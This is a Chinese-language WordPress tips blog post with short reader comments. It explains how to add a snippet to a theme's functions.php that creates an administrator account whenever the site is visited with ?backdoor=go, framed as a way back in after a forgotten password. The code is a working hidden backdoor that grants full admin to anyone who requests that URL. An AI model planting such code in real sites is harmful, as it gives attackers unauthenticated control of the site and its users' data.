黑客往往会在他人网站上创建隐秘的后门,从此进出网站畅通无阻。但不要以为后门一定会给我们带来坏处,当忘记管理员密码时,可以通过访问特定的地址来创建一个具有管理权限的WordPress用户。今天WP酷就与大家一起探讨,如何在紧急时为WordPress创建后门。
在主题目录functions.php中添加以下代码:
add_action('wp_head', 'creatbackdoor'); function creatbackdoor() { If ($_GET['backdoor'] == 'go') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('username', 'password'); $user = new WP_User($user_id); $user->set_role('administrator'); } } }
将username和password分别更改为所要创建的管理员用户名以及密码,所创建的后门地址为:example.com/?backdoor=go,当然此段代码可以再进行二次开发,只需修改其中的set_role即可指定所创建用户的权限,由此可以将此段代码再次拓展,用作于自动创建测试用户等等。
你好邪恶
@斌果 =w=这样很好有没有
我现在用的后台就是这样的…比较安全…
@电脑爱好者 这样别人也很难猜到后台来着……